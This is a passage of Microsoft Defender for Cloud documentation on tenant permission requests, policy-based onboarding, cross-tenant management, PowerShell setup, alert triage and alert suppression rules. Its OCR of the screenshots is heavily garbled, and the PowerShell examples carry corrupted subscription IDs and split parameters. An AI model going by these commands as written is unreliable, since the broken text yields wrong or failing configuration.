e The user's permissions are temporarily elevated. 


e Utilizing the new permissions, the user is assigned to the desired Azure RBAC role 
on the root management group. 


e The elevated permissions are removed. 


For more information of the Microsoft Entra elevation process, see Elevate access to 
manage all Azure subscriptions and management groups. 


Request tenant-wide permissions when yours 
are insufficient 


When you navigate to Defender for Cloud, you may see a banner that alerts you to the 
fact that your view is limited. If you see this banner, select it to send a request to the 
global administrator for your organization. In the request, you can include the role you'd 
like to be assigned and the global administrator will make a decision about which role 


to grant. 


It's the global administrator's decision whether to accept or reject these requests. 


© Important 


You can only submit one request every seven days. 


To request elevated permissions from your global administrator: 
1. From the Azure portal, open Microsoft Defender for Cloud. 


2. If the banner "You're seeing limited information." is present, select it. 
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@ Security policy 


Security solutions 
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e 
TZ Coverage 


@ Cloud connectors 
Enhance your threat protection capabilities > Explore your resources > 


3. In the detailed request form, select the desired role and the justification for why 
you need these permissions. 


Request tenant-level permissions 


CoreCisoTenant 


Tenant-level permissions 


This action will send a request to your global administrator to assign you the 
desired role on the root managmeent group of CoreCisoTenant tenant. 


To see the action that will be performed and/or learn more on how to 
perform this action manually, click here > 


Assign role 
User mjones@contoso.com 
Desired Role * @) Security Reader 


O Security Admin 


Learn more about Microsoft Defender for Cloud roles and permissions > 


Justification * Need permissions for Defender POC project. 


Request access d 


4. Select Request access. 


An email is sent to the global administrator. The email contains a link to Defender 
for Cloud where they can approve or reject the request. 


Action required—Review a request for root management group permissions 


? GA Reply Reply All Forward 
Microsoft Azure 2 PY Py : 


ə Global admin Thu 2021-01-21 13:41 


EE Microsoft Azure 


Review the request for root management 
group permissions in Microsoft Defender for Cloud 


mjones is requesting a role on the root management group of 
Contoso tenant so they can access tenant-level information within Azure 
Security Center. 


Requesting user MJones 
mjones@contoso.com 


Requested role Security Reader 


Tenant Contoso 


Justification: Need permissions for Defender POC project. 


Before reviewing the request, please ensure you're signed in as a global 
administrator on Contoso tenant in the Azure portal. 


Review the request > 


fY O in 


Privacy Statement 
Microsoft Corporation, One Microsoft Way, Redmond, WA 98052 


E Microsoft 


After the global administrator selects Review the request and completes the 


process, the decision is emailed to the requesting user. 


Next steps 


Learn more about Defender for Cloud permissions in the following related page: 


e Permissions in Microsoft Defender for Cloud 


Enable Defender for Cloud on all 
subscriptions in a management group 


Article e 02/27/2023 


You can use Azure Policy to enable Microsoft Defender for Cloud on all the Azure 
subscriptions within the same management group (MG). This is more convenient than 
accessing them individually from the portal, and works even if the subscriptions belong 


to different owners. 


Prerequisites 


Enable the resource provider _Microsoft.Security_ for the management group using 


the following Azure CLI command: 


Azure CLI 


az provider register --namespace Microsoft.Security --management-group-id ... 


Onboard a management group and all its 
subscriptions 


To onboard a management group and all its subscriptions: 


1. As a user with Security Admin permissions, open Azure Policy and search for the 
definition Enable Microsoft Defender for Cloud on your subscription. 
> Policy | Definitions 


P Search (Ctrl+/) + Policy definition -+ initiative definition > Export definitions C) Refresh 


= Overview 
Scope Definition type Category Search 


"I Getting started 87 selected [A definition types v| [Al categories v |_| Enable Microsoft Defender for Cl. 


d Compliance 


e Remediation 
DO Now export your definitions and assignments to GitHub and manage them using actions! Click on 'Export definition’ menu option. Learn more 
$ Events 
Authoring 
Definition location T4 


Definitions 


®) Assignments 


Z) Exemptions 


2. Select Assign and ensure you set the scope to the MG level. 


Enable Microsoft Defender for Cloud on your subscription 


Policy definition 


D Duplicate definition GO Export definition 


“A Essentials 


Q Tip 


Other than the scope, there are no required parameters. 


3. Select Remediation, and select Create a remediation task to ensure all existing 
subscriptions that don't have Defender for Cloud enabled, will get onboarded. 


Home > Policy > Enable Microsoft Defender for Cloud on your subscription 


Enable Microsoft Defender for Cloud on your subscription 


Assign policy 


Basics Parameters Non-compliance messages Review + create 


By default, this assignment will only take effect on newly created resources, Existing resources can be updated via a remediation task after the policy is assigned. For deploylfNotExists policies, the remediation task 
will deploy the specified template. For modify policies, the remediation task will edit tags on the existing resources. 


E create a remediation task C 


Policy to remediate 


| Enable Microsoft Defender for Cloud on your subscription 


4. Select Review + create. 
5. Review your information and select Create. 


When the definition is assigned, it will: 


e Detect all subscriptions in the MG that aren't yet registered with Defender for 
Cloud. 


e Mark those subscriptions as “non-compliant”. 


e Mark as "compliant" all registered subscriptions (regardless of whether they have 
Defender for Cloud's enhanced security features on or off). 


The remediation task will then enable Defender for Cloud's basic functionality on the 
non-compliant subscriptions. 


Optional modifications 


There are various ways you might choose to modify the Azure Policy definition: 


e Define compliance differently - The supplied policy classifies all subscriptions in 
the MG that aren't yet registered with Defender for Cloud as “non-compliant”. You 
might choose to set it to all subscriptions without Defender for Cloud's enhanced 
security features enabled. 


The supplied definition, defines either of the ‘pricing’ settings below as compliant. 
Meaning that a subscription set to ‘standard’ or ‘free’ is compliant. 


Q Tip 


When any Microsoft Defender plan is enabled, it's described in a policy 
definition as being on the ‘Standard’ setting. When it's disabled, it's ‘Free’. To 
learn about the differences between these plans, see Microsoft Defender for 


Cloud's Defender plans. 


"existenceCondition": { 


"anyof"™: [ 
{ 
"field": "microsoft.security/pricings/pricingTier", 
"equals": "standard" 
te 
{ 
"field": "microsoft.security/pricings/pricingTier", 
"equals": "free" 
} 
] 


J 


If you change it to the following, only subscriptions set to 'standard' would be 


classified as compliant: 


"existenceCondition": { 


{ 


"field": “microsoft.security/pricings/pricingTier", 
"equals": "standard" 
Jo 
J 


e Define some Microsoft Defender plans to apply when enabling Defender for 
Cloud - The supplied policy enables Defender for Cloud without any of the 
optional enhanced security features. You might choose to enable one or more of 


the Microsoft Defender plans. 


The supplied definition's deployment section has a parameter pricingTier. By 


default, this is set to free, but you can modify it. 


Next steps: 


Now that you've onboarded an entire management group, enable the enhanced security 


features. 


Enable enhanced protections 


Cross-tenant management in Defender 
for Cloud 


Article e 05/10/2023 


Cross-tenant management enables you to view and manage the security posture of 
multiple tenants in Defender for Cloud by leveraging Azure Lighthouse. Manage 
multiple tenants efficiently, from a single view, without having to sign in to each tenant's 


directory. 


e Service providers can manage the security posture of resources, for multiple 


customers, from within their own tenant. 


e Security teams of organizations with multiple tenants can view and manage their 
security posture from a single location. 


Set up cross-tenant management 


Azure delegated resource management is one of the key components of Azure 
Lighthouse. Set up cross-tenant management by delegating access to resources of 
managed tenants to your own tenant using these instructions from Azure Lighthouse's 
documentation: Onboard a customer to Azure Lighthouse. 


How does cross-tenant management work in 
Defender for Cloud 


You are able to review and manage subscriptions across multiple tenants in the same 


way that you manage multiple subscriptions in a single tenant. 


From the top menu bar, click the filter icon, and select the subscriptions, from each 
tenant's directory, you'd like to view. 


S.E 


The views and actions are basically the same. Here are some examples: 


e Manage security policies: From one view, manage the security posture of many 
resources with policies, take actions with security recommendations, and collect 


and manage security-related data. 


Improve Secure Score and compliance posture: Cross-tenant visibility enables you 
to view the overall security posture of all your tenants and where and how to best 


improve the secure score and compliance posture for each of them. 


e Remediate recommendations: Monitor and remediate a recommendation for 


many resources from various tenants at one time. You can then immediately tackle 


the vulnerabilities that present the highest risk across all tenants. 


e Manage Alerts: Detect alerts throughout the different tenants. Take action on 
resources that are out of compliance with actionable remediation steps. 


e Manage advanced cloud defense features and more: Manage the various threat 
protection services, such as just-in-time (JIT) VM access, Adaptive network 
hardening, adaptive application controls, and more. 


Next steps 


This article explains how cross-tenant management works in Defender for Cloud. To 
discover how Azure Lighthouse can simplify cross-tenant management within an 
enterprise which uses multiple Azure AD tenants, see Azure Lighthouse in enterprise 
scenarios. 


Quickstart: Automate onboarding of 
Microsoft Defender for Cloud using 
PowerShell 


Article e 03/08/2023 


You can secure your Azure workloads programmatically, using the Microsoft Defender 
for Cloud PowerShell module. Using PowerShell enables you to automate tasks and 
avoid the human error inherent in manual tasks. This is especially useful in large-scale 
deployments that involve dozens of subscriptions with hundreds and thousands of 
resources, all of which must be secured from the beginning. 


Onboarding Microsoft Defender for Cloud using PowerShell enables you to 
programmatically automate onboarding and management of your Azure resources and 
add the necessary security controls. 


This article provides a sample PowerShell script that can be modified and used in your 
environment to roll out Defender for Cloud across your subscriptions. 


In this example, we'll enable Defender for Cloud on a subscription with ID: d07c0080- 
170c-4c24-861d-9c817742786c and apply the recommended settings that provide a 
high level of protection, by enabling Microsoft Defender for Cloud's enhanced security 
features, which provides advanced threat protection and detection capabilities: 


1. Enable the enhanced security in Microsoft Defender for Cloud. 


2. Set the Log Analytics workspace to which the Log Analytics agent will send the 
data it collects on the VMs associated with the subscription — in this example, an 


existing user defined workspace (myWorkspace). 


LA) 


. Activate Defender for Cloud’s automatic agent provisioning, which deploys the Log 
Analytics agent. 


4. Set the organization's CISO as the security contact for Defender for Cloud alerts 
and notable events. 


LI 


. Assign Defender for Cloud's default security policies. 


Prerequisites 


These steps should be performed before you run the Defender for Cloud cmdlets: 


1. Run PowerShell as admin. 
2. Run the following commands in PowerShell: 
PowerShell 


Set-ExecutionPolicy -ExecutionPolicy AllSigned 


PowerShell 


Install-Module -Name Az.Security -Force 


Onboard Defender for Cloud using PowerShell 
1. Register your subscriptions to the Defender for Cloud Resource Provider: 


PowerShell 


Set-AzContext -Subscription "d@7c0@080-170c-4c24-861d-9c817742786c" 


PowerShell 
Register-AzResourceProvider -ProviderNamespace 'Microsoft.Security' 
2. Optional: Set the coverage level (Microsoft Defender for Cloud's enhanced security 
features on/off) of the subscriptions. If undefined, these features are off: 
PowerShell 


Set-AzContext -Subscription "d@7c0@@80-170c-4c24-861d-9c817742786c" 


PowerShell 


Set-AzSecurityPricing -Name "VirtualMachines" -PricingTier "Standard" 


3. Configure a Log Analytics workspace to which the agents will report. You must 
have a Log Analytics workspace that you already created, that the subscription’s 
VMs will report to. You can define multiple subscriptions to report to the same 
workspace. If not defined, the default workspace will be used. 


PowerShell 


Set-AzSecurityWorkspaceSetting -Name "default" -Scope 
"/subscriptions/d@7c0080-170c -4c24-861d-9c817742786c" -Workspaceld 
"/subscriptions/d@7c0080-170c -4c24-861d- 
9c817742786c/resourceGroups/myRg/providers/Microsoft.OperationalInsight 
s/workspaces/myWorkspace" 


4. Auto-provision installation of the Log Analytics agent on your Azure VMs: 


PowerShell 


Set-AzContext -Subscription "d@7c@Q@80-170c-4c24-861d-9c817742786c" 


PowerShell 


Set-AzSecurityAutoProvisioningSetting -Name "default" - 
EnableAutoProvision 


O Note 


We recommend that you enable auto provisioning to make sure that your 
Azure virtual machines are automatically protected by Microsoft Defender for 
Cloud. 


5. Optional: It's highly recommended that you define the security contact details for 
the subscriptions you onboard, which will be used as the recipients of alerts and 
notifications generated by Defender for Cloud: 


PowerShell 


Set-AzSecurityContact -Name "default1" -Email "CISO@my-org.com" - 
AlertAdmin -NotifyOnAlert 


6. Assign the default Defender for Cloud policy initiative: 
PowerShell 
Register-AzResourceProvider -ProviderNamespace 
"Microsoft.PolicyInsights ' 
PowerShell 


$Policy = Get-AzPolicySetDefinition | where {$_.Properties.displayName 
-EQ ‘Azure Security Benchmark’ } 


New-AzPolicyAssignment -Name ‘ASC Default <d@7c00@80-170c-4c24-861d- 
9c817742786c>' -DisplayName ‘Defender for Cloud Default <subscription 
ID>' -PolicySetDefinition $Policy -Scope '/subscriptions/d@7cQ@80-170c- 
4c24-861d-9c817742786c ' 


You've successfully onboarded Microsoft Defender for Cloud with PowerShell. 


You can now use these PowerShell cmdlets with automation scripts to programmatically 
iterate across subscriptions and resources. This saves time and reduces the likelihood of 


human error. You can use this sample script’ as reference. 


See also 


To learn more about how you can use PowerShell to automate onboarding to Defender 
for Cloud, see the following article: 


e Az.Security 
To learn more about Defender for Cloud, see the following articles: 


e Setting security policies in Microsoft Defender for Cloud. Learn how to configure 
security policies for your Azure subscriptions and resource groups. 

e Managing and responding to security alerts in Microsoft Defender for Cloud. Learn 
how to manage and respond to security alerts. 


Manage and respond to security alerts 
in Microsoft Defender for Cloud 


Article e 03/28/2023 


This topic shows you how to view and process Defender for Cloud's alerts and protect 
your resources. 


Advanced detections that trigger security alerts are only available with Microsoft 
Defender for Cloud's enhanced security features enabled. A free trial is available. To 
upgrade, see Enable enhanced protections. 


What are security alerts? 


Defender for Cloud collects, analyzes, and integrates log data from your Azure, hybrid, 
and multicloud resources, the network, and connected partner solutions, such as 
firewalls and endpoint agents. Defender for Cloud uses the log data to detect real 
threats and reduce false positives. A list of prioritized security alerts is shown in 
Defender for Cloud along with the information you need to quickly investigate the 
problem and the steps to take to remediate an attack. 


To learn about the different types of alerts, see Security alerts - a reference guide. 


For an overview of how Defender for Cloud generates alerts, see How Microsoft 
Defender for Cloud detects and responds to threats. 


Manage your security alerts 


1. From Defender for Cloud's overview page, select the Security alerts tile at the top 
of the page, or the link from the sidebar. 


fa] Microsoft Defender for Cloud | Overview & 


Showing 59 subscriptions 


| P Search (Ctri+/) 


General 

© overview 

@ Getting started 

ZZ Recommendations 
© Inventory 

GO Community 

Cloud Security 

© Secure Score 

@ Regulatory compliance 
Q Workload protections 


E Firewall Manager 
Management 
ili Environment settings 


E Security solutions 


ZA Workflow automation 


| « Y Subscriptions E What's new 
jum 
? 59 AJA GOA GADA Ọ 121 
Azure subscriptions AWS accounts GCP projects Active recommendations Security alerts 


DO Secure score 
Current secure score 


( J COMPLETED 


D Regulatory compliance 


Current compliance by passed controls 


Controls 1/16 UKO and U... 0/7 

bo SOC TSP = 1/13 

60% zr COMPLETED dg NIST SP 80... B 2/23 
ar Y= Recommendations 

= HIPAA HITR... i 2/22 

NIST SP 80... be 3/29 


Improve your secure score > 


DO Workload protections 


Resource coverage 
95% For full protection, enable 10 resource plans 


Alerts by severity 


Improve your compliance > 


>a Inventory 


Unmonitored VMs 

60 To better protect your organization, 
we recommend installing agents 

Total Resources 


20 High 


10 


8 Sun 15 Sun 


Enhance your threat protection capabilities > 


The security alerts page opens. 


Security alerts 


©) Refresh E Change status w TE Open query 


0 644 


Active alerts 


A earch by ID, title, or affected resource 


< Previous 


[_] severity A Alert title ty 

Ọ Suspicious process executed [seen ... 
@ suspicious process executed [seen ... 
@ Suspicious process executed [seen ... 
@ suspicious process executed [seen ... 
Ọ suspicious process executed [seen ... 
Ọ suspicious process executed 


@ suspicious process executed 


@ Exposed Kubernetes dashboard det... 


Ọ suspicious process executed [seen ... 


@ Suppression rules 


E 34 


Affected resources 


Status == Active X 


Affected resource Ty 
KA CH-VictimvM00-Dev 
KA cH-VictimvMo0 

EA dockervm-redhat 


E dockeroniaasdemo 


© dockervm-redhat 


KA dockervm-redhat 


@ Microsoft Defender for Cloud test ale... # ASC-AKS-CLOUD-TALK 


E cH-VictimvM00-Dev 


Page | 1 


v | of 17 | Next > | 


PE 
| | 66 
eIIIIIOIIIIIIO. piw 
zsm 126 


g Security alerts map (Preview) 


Severity == Low, Medium, High X 


© samplecrmweblobstor... 


48 ASC-WORKLOAD-PRO... 


E 3900 


T unhealthy (2936) | Healthy (679) Not applicable (285) 


Explore your resources > 


© Create sample alerts 


Active alerts by severity 
HI E 
lHigh (166) [Medium (414) [Low (64) 


Time == Last month X bo Add filter 


| No grouping v 


Activity start time (UTC+2) Ty MITRE ATT&CK® tactics Status Ty 
11/22/20, 3:00 AM E, Credential Access Active 
11/22/20, 1:00 AM E, Credential Access Active 
11/21/20, 3:00 AM E, Credential Access Active 
11/21/20, 1:00 AM S Credential Access Active 
11/20/20, 7:00 AM E, Credential Access Active 
11/20/20, 6:00 AM E, Credential Access Active 
11/20/20, 5:00 AM E, Credential Access Active 
11/20/20, 3:00 AM GO Persistence Active 
11/20/20, 12:00 AM E Initial Access Active 
11/19/20, 7:00 PM a Credential Access Active 


2. To filter the alerts list, select any of the relevant filters. You can optionally add 
further filters with the Add filter option. 


Severity == High X Time == Last month X be Add filter 


Add filter 
EEE Fiter 
irce Ty Activity start time (UTC+2) Ty MITE 


Alert name 
‘MOO 10/30/20, 2:00 AM Se ° 
Affected resource 
MOD 10/30/20, 1:00 AM S 
| Resource type 
'M00-Dev 10/30/20, 12:00 AM S 
MITRE ATT&CK® tactics 
MIO 10/30/20, 12:00 AM S cre 2 
Tags 
'MO0-Dev 10/29/20, 11:00 PM E cre 2 
Creator 
MO 10/29/20, 10:00 PM EZ, cre owner 
'MO00-Dev 10/29/20, 9:00 PM EZ, cre: environment | 


The list updates according to the filtering options you've selected. For example, 
you might you want to address security alerts that occurred in the last 24 hours 
because you are investigating a potential breach in the system. 


Respond to security alerts 


1. From the Security alerts list, select an alert. A side pane opens and shows a 
description of the alert and all the affected resources. 


Security alerts 


© Refresh E Change status ~ TE Open query @ suppression rules Ê Security alerts map (Preview) I Create sample alerts 
O 3 GO 1 Active alerts by severity 
Active alerts Affected resources Iren (3) 
A Search by ID, title, or affected resource Status == Active X Severity == High X DO Exposed Kubernetes dashboard detected 
Time == Last month X ty Add filter | No grouping v] High `t Active J © 11/05/20, 13:58 
_=- +>. ~~. Severity Status Activity time 
O Severity Alert title Ty Affected resource Ty Activity start time 


Alert description 


Kubernetes audit log analysis detected exposure of the 
n I ASC-AKS-~ -TALK 11 , 1:58 PM à 
High @ Exposed Kubernetes dashboard detect. SC-AKS-CLOUD-TALK /05/20, 1:58 Kubernetes Dashboard by a LoadBalancer service. 


DI lean © Microsoft Defender for Cloud test alert... #8 ASC-AKS-CLOUD-TALK 11/04/20, 11:50 am _-ExPosed dashboard allows an unauthenticated access to the 
cluster management and poses a security threat. 


oO | High @ Exposed Kubernetes dashboard detect... $% ASC-AKS-CLOUD-TALK 10/26/20, 10:44 PM 
Affected resource 


oe ASC-AKS-CLOUD-TALK 
P  Kubernetes service 


ASC DEMO 
Subscription 


MITRE ATT&CK® tactics © 


e Initial Access 


edi 


View full details | Take action 


Q Tip 


With this side pane open, you can quickly review the alerts list with the up and 


down arrows on your keyboard. 


2. For further information, select View full details. 


The left pane of the security alert page shows high-level information regarding the 


security alert: title, severity, status, activity time, description of the suspicious 


activity, and the affected resource. The Azure tags for the affected resource helps 


you to understand the organizational context of the resource. 


The right pane includes the Alert details tab containing further details of the alert 


to help you investigate the issue: IP addresses, files, processes, and more. 


Dashboard 


Security alert d 


25181-892ad5bb9a 
@ Potential SQL Injection 


High 2. Active ee © 06/11/20, 1... 
Severity Status Activity time 


Alert description 
Potential SQL Injection was detected on your database 
Demo on server R-DEV\SQLEXPRESS 


Affected resource 


= Dey Env: Development 
Azure Arc machine E E 


? DS-ThreatDetection_Demo. 
Subscription 


Intent © 


© Pre-attack 


TE 


wv Was this useful? O Yes O No Sra 


Alert details Take action 


Client IP Address 


127.0.0.1 


Client IP Location 


Location couldn't be inferred from... 


See more 


Client Principal Name 


ronmat 


Client Application 
-Net SqlClient Data Provider 


Related entities 


v E Account (1) 
w Ea Azure resource (1) 


v Bro 


v E Network connection (1) 


Next: Take Action >> 


Oms Workspace ID 
61d507e7 


Oms Agent ID 
6a3e9295-42 


Threat ID 
1 


Potential Causes 


Defect in application code... 


Vulnerable Statement 

SELECT * FROM sqli_users WHERE... 
See more 

Detected by 

EE Microsoft 


Also in the right pane is the Take action tab. Use this tab to take further actions 


regarding the security alert. Actions such as: 


e /nspect resource context - sends you to the resource's activity logs that 


support the security alert 


e Mitigate the threat - provides manual remediation steps for this security alert 


e Prevent future attacks - provides security recommendations to help reduce 


the attack surface, increase security posture, and thus prevent future attacks 


e Trigger automated response - provides the option to trigger a logic app as a 


response to this security alert 


e Suppress similar alerts - provides the option to suppress future alerts with 
similar characteristics if the alert isn't relevant for your organization 


Dashboard 
Security alert d 
25181-892ad5bb9a 


Alert details Take action 


Ọ Potential SQL Injection 


A PE Inspect resource context 


High `i Active © 06/11/20, 1... 


Vv 
Severity Status Activity time Start with examining the resource logs around the time of the alert. 
Open logs 
Alert description 
Potential SQL Injection was detected on your database 
Demo on server R-DEV\SQLEXPRESS ^ GO Mitigate the threat 


Affected resource 


E e Env: Devel nt 
Azure Arc machine GREEN 


Read more about SQL Injection threats and best practices for safe application code. 


You have 34 more alerts on the affected resource. View all >> 


? DS-ThreatDetection_ Demo A 0 


e Prevent future attacks 
Subscription 


Your top 2 active security recommendations on 5 RONMAT-DEV: 


Intent © 
| Medium Windows Defender Exploit Guard should be enabled on your machines 

è Pre-attack | 
High 


* 


Vulnerabilities on your SQL servers on machine should be remediated 


Solving security recommendations can prevent future attacks by reducing attack surface. 
View all 2 recommendations >> 

v JA Trigger automated response 

wv ZZ Suppress similar alerts 


v bd Configure email notification settings 


wv Was this useful? O Yes O No KO 


Next: Take Action >> 


Change the status of multiple security alerts at 
once 


The alerts list includes checkboxes so you can handle multiple alerts at once. For 
example, for triaging purposes you might decide to dismiss all informational alerts for a 
specific resource. 


1. Filter according to the alerts you want to handle in bulk. 


In this example, we've selected all alerts with severity of ‘Informational’ for the 
resource 'ASC-AKS-CLOUD-TALK'. 


Active alerts by severity 


1 


Affected resources 


0 33 


Active alerts Informational (33) 


ASC-AKS-CLOUD-TALK >< 


Subscription == All 


| P Search by ID, title, ... 


bora 
[_] Severity A Alert title Ty Affected resource Ty Activity start time (UT... Ty MITRE ATT&CK.,. Status Ty 
I Informational ~" Manipulation of schedu... $ ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM œ) Persistence Active 

O Informational ~+- Manipulation of schedu... $} ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM ZO Persistence Active 

O Informational ok Manipulation of schedu... $8 ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM ZO Persistence Active 

O Informational ~" Manipulation of schedu... ZO ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM ZG Persistence Active 

I Informational ~" Manipulation of schedu... GO ASC-AKS-CLOUD-TALK 12/13/21, 08:25 AM GO Persistence Active 

I Informational ek Manipulation of schedu... $ ASC-AKS-CLOUD-TALK 12/13/21, 08:25 AM C) Persistence Active 

O Informational ~- Manipulation of schedu... $8 ASC-AKS-CLOUD-TALK 12/13/21, 08:25 AM ZO Persistence Active 


2. Use the checkboxes to select the alerts to be processed - or use the checkbox at 
the top of the list to select them all. 


In this example, we've selected all alerts. Notice that the Change status button is 


now available. 


S Change status v 


31 


Affected resources 


Active alerts by severity 


Ọ 33 


Active alerts Informational (33) 


| Search by ID, title... Subscription == All Severity == Informational >< Affected resource == ASC-AKS-CLOUD-TALK >X 


Bur i 


t Add filter No grouping Vv 
Alert title Ty Affected resource Ty Activity start time (UTC+2) Ty | MITRE ATT&CK® t... 


Informational +- Manipulation of scheduled t... $% ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM GO Persistence 
E Informational +/* Manipulation of scheduled t... 4% ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM ZG Persistence 
v] Informational +- Manipulation of scheduled t... $% ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM GO Persistence 
E Informational ~" Manipulation of scheduled t... $% ASC-AKS-CLOUD-TALK 12/14/21, 08:25 AM GO Persistence 
E Informational ~- Manipulation of scheduled t... 4% ASC-AKS-CLOUD-TALK 12/13/21, 08:25 AM (ea) Persistence 
E Informational ek Manipulation of scheduled t... ZO ASC-AKS-CLOUD-TALK 12/13/21, 08:25 AM GO Persistence 
E Informational ~" Manipulation of scheduled t... 4% ASC-AKS-CLOUD-TALK 12/13/21, 08:25 AM GO Persistence 


3. Use the Change status options to set the desired status. 


— Change status x 
31t Active 


O Dismissed 


O 


The alerts shown in the current page will have their status changed to the selected 


value. 


See also 


In this document, you learned how to view security alerts. See the following pages for 


related material: 


e Configure alert suppression rules 
e Automate responses to Defender for Cloud triggers 
e Security alerts - a reference guide 


Suppress alerts from Microsoft 
Defender for Cloud 
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This page explains how you can use alerts suppression rules to suppress false positives 
or other unwanted security alerts from Defender for Cloud. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Required roles and permissions: Security admin and Owner can create/delete rules. 


Security reader and Reader can view rules. 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


What are suppression rules? 


The Microsoft Defender plans detect threats in your environment and generate security 
alerts. When a single alert isn't interesting or relevant, you can manually dismiss it. 
Suppression rules let you automatically dismiss similar alerts in the future. 


Just like when you identify an email as spam, you want to review your suppressed alerts 
periodically to make sure you're not missing any real threats. 


Some examples of how to use suppression rule are: 


e Suppress alerts that you've identified as false positives 
e Suppress alerts that are being triggered too often to be useful 


g Security Center | Security alerts 
Sh 


rowing 3 subscriptions 


©) Refresh S KO Open query GS suppression rules & Security alerts map © Sample alerts Q Guides & Feedback 


d Download csv report 


@ We would like to hear your opinion about our new security alerts page! Click here to send us feedback > 


Active alerts by severity 
ee 


PHigh (5) Medium (12) [Low (10) 


027 


Active alerts 


33 


Affected resources 


Æ Search by ID, title, or affected resource Subscription == ASC DEMO Status == Active X Severity == Low, Medium, High >X< Time == Last month X 


bo Add filter 
No grouping 
Severity A Alert title Ty Affected resource Ty Activity start time (UTC+2) Ty MITRE ATT&CK® tactics Status Ty 
| High D Azure Security Center test alert for... 4 ASC-AKS-CLOUD-TALK 02/01/21, 05:04 PM GO Persistence Active 
| High D Exposed Kubernetes dashboard de... #4» ASC-AKS-CLOUD- 01/28/21, 04:51 PM EZ initial Access Active 
| High 9 Exposed Kubernetes dashboard de... $ ASC-IGNITE-DE 01/26/21, 11:04 AM EO Initial Access Active 
| High O Access from aT... Sample alert = Sample-Storage 01/25/21, 11:13 AM ZA Pre-attack Active 
| High 9 Unusual amoun... Sample alert = Sample-Storage 01/25/21, 11:13 AM GZ Exfiltration Active 
Medium O Exposed Kubernetes service detect... $% ASC-AKS-CLOUD-TALK 01/28/21, 04:55 PM E Initial Access Active 
Medium O Exposed Kubernetes service detect... $% ASC-AKS-CLOUD-TALK 01/28/21, 04:55 PM E Initial Access Active 
Medium D Exposed Kubernetes service detect... $% ASC-AKS-CLOUD-TALK 01/28/21, 04:55 PM EZ initial Access Active 
| Medium 9 Container with a sensitive volume... $% ASC-AKS-CLOUD-TALK 01/28/21, 04:55 PM % Privilege Escalation Active 
Medium 9 Exposed Kubernetes service detect... $% ASC-AKS-CLOUD-TALK 01/28/21, 04:55 PM E Initial Access Active 
Medium O Exposed Kubernetes service detect... $% ASC-IGNITE-DEMO 01/28/21, 04:48 PM E Initial Access Active 
Medium @ Exposed Kubernetes service detect... $% ASC-IGNITE-DEMO 01/28/21, 04:48 PM EZ initial Access Active 
Medium D Exposed Kubernetes service detect... $% ASC-IGNITE-DEMO 01/28/21, 04:48 PM EZ initial Access Active 
Medium AL Exposed Kubernetes service detect... $% ASC-IGNITE-DEMO 01/28/21, 04:48 PM E initial Access Active 
| Medium 9 Container with a sensitive volume... $ ASC-IGNITE-DEMO 01/26/21, 11:04 AM % Privilege Escalation Active 
| Medium D Unusual deletio... Sample alert = Sample-Storage 01/25/21, 11:13 AM ZZ Exfiltration Active 
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Create a suppression rule 


You can apply suppression rules to management groups or to subscriptions. 


e To suppress alerts for a management group, use Azure Policy. 
e To suppress alerts for subscriptions, use the Azure portal or the REST API. 


Alert types that were never triggered on a subscription or management group before 
the rule was created won't be suppressed. 


To create a rule for a specific alert in the Azure portal: 


1. From Defender for Cloud's security alerts page, select the alert you want to 
suppress. 


2. From the details pane, select Take action. 


3. In the Suppress similar alerts section of the Take action tab, select Create 


suppression rule. 


4. In the New suppression rule pane, enter the details of your new rule. 


e Entities - The resources that the rule applies to. You can specify a single 
resource, multiple resources, or resources that contain a partial resource ID. If 
you don't specify any resources, the rule applies to all resources in the 
subscription. 

e Name - A name for the rule. Rule names must begin with a letter or a 
number, be between 2 and 50 characters, and contain no symbols other than 
dashes (-) or underscores (_). 

e State - Enabled or disabled. 

e Reason - Select one of the built-in reasons or ‘other’ to specify your own 
reason in the comment. 

e Expiration date - An end date and time for the rule. Rules can run for without 
any time limit as set in Expiration date. 


5. You select Simulate to see the number of previously received alerts that would 
have been dismissed if the rule was active. 


6. Save the rule. 


You can also select the Suppression rules button in the Security Alerts page and select 
Create suppression rule to enter the details of your new rule. 


Microsoft Azure 


Dashboard > Microsoft Defender for Cloud | Security alerts > Suppression rules 


+ Suppression rules 


+ Create new suppression rule Edit I| Remove (% Learn more 


d Ù 


Edit a suppression rule 


To edit a rule you've created from the suppression rules page: 


1. From Defender for Cloud's security alerts page, select Suppression rules at the top 
of the page. 


Home > Microsoft Defender for Cloud 


Q Microsoft Defender for Cloud | Security alerts 


Showing 65 subscriptions 


[o Search | « © Refresh $5 Chang usv E Open query @ Suppression rules | E Security alerts map D Sample alerts 


2. The suppression rules page opens with all the rules for the selected subscriptions. 


Microsoft Azure DO Search resources, services, and docs (G+/) 


Dashboard > Microsoft Defender for Cloud | Security alerts Suppression rules 


Suppression rules x 
-+ Create new suppression rule TZI Learn more 
2 | ( Last Modified : All 


a Select All Showing 2 items 


Rule Name Ty Subscription Name îy Rule Last Modified 7, Expiration Date TA, Rule State TL 
[C] Authentication _activity E er 05/03/20, 4:50 PM 07/28/20, 4:47 PM CÌ) Enabled 
[C] Demo_machine_SSHbruteForce E ekr 05/03/20, 4:52 PM 11/01/20, 4:50 PM CÌ) Enabled 


3. To edit a single rule, open the three dots (...) at the end of the rule and select Edit. 
4. Change the details of the rule and select Apply. 


To delete a rule, use the same three dots menu and select Remove. 


Create and manage suppression rules with the 
API 


You can create, view, or delete alert suppression rules using the Defender for Cloud 
REST API. 


The relevant HTTP methods for suppression rules in the REST API are: 
e PUT: To create or update a suppression rule in a specified subscription. 


e GET: 

o To list all rules configured for a specified subscription. This method returns an 
array of the applicable rules. 

o To get the details of a specific rule on a specified subscription. This method 
returns one suppression rule. 

o To simulate the impact of a suppression rule still in the design phase. This call 
identifies which of your existing alerts would have been dismissed if the rule 
had been active. 


e DELETE: Deletes an existing rule (but doesn't change the status of alerts already 
dismissed by it). 


For details and usage examples, see the API documentation. 


Next steps 


This article described the suppression rules in Microsoft Defender for Cloud that 


automatically dismiss unwanted alerts. 
Learn more about security alerts: 


e Security alerts generated by Defender for Cloud 


Stream alerts to a SIEM, SOAR, or IT 
